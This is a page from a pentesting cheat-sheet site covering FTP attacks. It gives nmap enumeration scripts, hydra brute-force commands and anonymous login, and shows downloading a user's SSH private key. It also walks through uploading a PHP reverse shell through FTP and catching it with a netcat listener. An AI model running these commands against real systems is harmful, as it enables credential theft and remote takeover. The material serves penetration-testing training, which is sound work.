Exploit Notes
Exploit Notes

Exploits related to Network

Protocol

Dynamic Host Configuration Protocol (DHCP) Pentesting
FTP (File Transfer Protocol) Pentesting
IRC (Internet Relay Chat) Pentesting
Memcache Pentesting
Modbus Pentesting
NFS (Network File System) Pentesting
NTP (Network Time Protocol) Pentesting
RTSP (Real Time Streaming Protocol) Pentesting
Restricted Shell (rbash, rzsh) Bypass
SNMP (Simple Network Management Protocol) Pentesting
SSH (Secure Shell) Pentesting
TFTP (Trivial File Transfer Protocol) Pentesting
Telnet Pentesting
UPnP (Universal Plug and Play) Pentesting
VNC (Virtual Network Computing) Pentesting
WASTE Pentesting

Port Forwarding

Port Forwarding with Chisel
Port Forwarding with Plink
Port Forwarding with SSH
Port Forwarding with Socat

WiFi

MITM (Man in the Middle) Attack
WiFi Hacking

Tool

Tshark
Wireshark

VPN

IPsec VPN Pentesting
OpenVPN Hacking

Others

ARP (Address Resolution Protocol) Spoofing
EthernetIP Pentesting
Firewall
Honeypots
MAC Flooding Attack
Network Traffic Analysis (NTA)
Networking
Rsync Pentesting
Tor

FTP (File Transfer Protocol) Pentesting

Last modified: 2023-02-11

Network Reverse Shell

FTP is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network. Default ports are 20 (for data), 21 (for control).

Enumeration

nmap --script ftp-anon -p 21 <target-ip>
nmap --script ftp-vuln* -p 21 <target-ip>
nmap --script ftp-* -p 21 <target-ip>

Brute Force Credentials

hydra -l username -P passwords.txt <target-ip> ftp
hydra -L username.txt -p password <target-ip> ftp

hydra -l username -P passwords.txt ftp://<target-ip>
hydra -L usernames.txt -p password ftp://<target-ip>

Investigation

nc <target-ip> 21

Using OpenSSL

First off, open listener.

nc -vn <target-ip> 21

Then run the command below.

openssl s_client -connect <target-ip>:21 -starttls ftp

Connect

ftp <target-ip>
ftp <target-ip> <target-port>

Sometimes we might be able to the anonymous login.
Not likely, but worth a try.

ftp <target-ip>
username: anonymous
password: anonymous

Commands in FTP

After connecting FTP, we can search directories and files, then download them to your local machine, and put local files to the target system.
The FTP commands are almost the same as Linux commands.

ftp> pwd
ftp> cd
ftp> ls
# Print the content of the file
ftp> get example.txt -

# Switch to passive mode.
ftp> passive

# Print usage
ftp> ?

Transfer Files

To transfer files to local machine,

ftp> get example.txt
ftp> get home/user/.ssh/id_rsa ./id_rsa

# recursive
wget -r --user='username' --password='password' ftp://<target-ip>/sample

Reverse Shell over Website

If the target website allows users to access the ftp directory, we can upload the exploit for the reverse shell and get a shell.

  1. Download the Payload

    Get the payload for the reverse shell from this repository.

    wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

# --------------------------------------------------------------------------------

# Edit some variables in shell.php
$ip = '<your-local-ip>';
$port = 1234;

  2. Upload the Payload to FTP Directory

    Connect to FTP and upload the payload.

    ftp <target-ip>

# Upload the payload you downloaded
ftp> put shell.php

  3. Get a Shell

    At first, w need to open listener in your local machine.

    nc -lvnp 1234

    In a web browser, access to "http://vulnerable.com/path/to/ftp/shell.php".
    We should get a target shell.


Start FTP Server

1. Install vsftpd

sudp apt install vsftpd

To check the config file for vsftpd, run the following command.

less /etc/vsftpd.conf

2. Start FTP Server

Below are commands for starting FTP server and checking the status.

sudo systemctl start vsftpd
sudo systemctl status vsftpd

If you’ve updated the config file, you need to restart vsftpd.

sudo systemctl restart vsftpd
Twitter GitHub

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.